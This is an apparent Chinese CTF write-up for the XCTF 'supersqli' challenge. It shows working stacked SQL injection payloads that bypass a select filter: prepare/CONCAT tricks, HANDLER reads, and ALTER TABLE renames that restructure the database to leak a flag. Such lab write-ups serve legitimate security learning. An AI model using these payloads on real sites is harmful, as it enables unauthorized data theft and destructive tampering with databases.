WEB视频自适应 springcloud 分布式 automation jtable Amaze UI Validator vue遍历 bootstrap后台模版 进销存源码 etl数据 网络游戏server编程 solr索引 判断bigdecimal是否为空 python对象 python数字类型 python返回值 java实现 java发邮件 java如何连接mysql java环境变量配置 配置java环境 java读取文件内容 java查看数据类型 java遍历 java生成文件 linux远程 网页游戏代码 战地女记者 找茬辅助 dnf男柔道加点 js验证码 梦想世界答题器 oracle游标 java数组转字符串 blender建模 mw3 上网监控系统 javascript程序设计 支持无线充电的手机
当前位置: 首页 > 学习教程  > 编程语言

Xctf练习sql注入--supersqli

2020/12/28 18:43:53 文章标签:

三种方法 方法一 1 回显正常 1’回显不正常,报sql语法错误 1’ -- 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) 1’ order by 3 -- 回显失败,说明有2个注入点 1’ union select 1,2 -- 回显显示过滤语句: 1’; show databases -- 爆数据库名 -1’; show tables …

三种方法

方法一

=1 回显正常
=1’回显不正常,报sql语法错误
=1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用)
=1’ order by 3 --+ 回显失败,说明有2个注入点
=1’ union select 1,2 --+ 回显显示过滤语句:
在这里插入图片描述
=1’; show databases --+ 爆数据库名
在这里插入图片描述

=-1’; show tables --+ 绕过过滤,显示表下的列名
在这里插入图片描述
=1’;show columns from words --+ 尝试堆叠注入(多条语句)
在这里插入图片描述

nothing…
在这里插入图片描述

想要进一步拿到信息,只有想办法绕过select语句

这里需要用到 sql语句的预编译
https://blog.csdn.net/weixin_45694388/article/details/111871581

-1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');prepare aaa from @sql;EXECUTE aaa;#

在这里插入图片描述
再次通过大小写绕过关键字prepare过滤
在这里插入图片描述

方法二:handler查询

mysql可以使用select查询表中的数据,也可使用handler语句,这条语句是一行一行的浏览一个表中的数据。
handler可以用于MyISAM和InnoDB表。
使用方法:
handler table_name open打开一张表
handler table_name read first读取第一行内容,
handler table_name read next依次获取其它行
最后一行执行之后再执行handel table_name read next会返回一个空的结果。

-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

方法三 他好骚啊

有如下列,其中有一个列就是data列我们是可以进行查询,爆出内容的,所以我们可以利用数据库修改表名和列名的方法,将我们要查询的表名改成第二个,就可以查询出我们想要的内容了

=1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

介绍一下这几句:
alter table words rename to aaaa;先把原来的words表名字改成别的,这个随便
alter table 1919810931114514 rename to words;将表1919810931114514的名字改为words
alter table words change flag id varchar(100);将改完名字后的表中的flag改为id,字符串尽量长点吧

然后我们用1’ or 1=1 --+直接就能得到正确结果
在这里插入图片描述


本文链接: http://www.dtmao.cc/news_show_550104.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?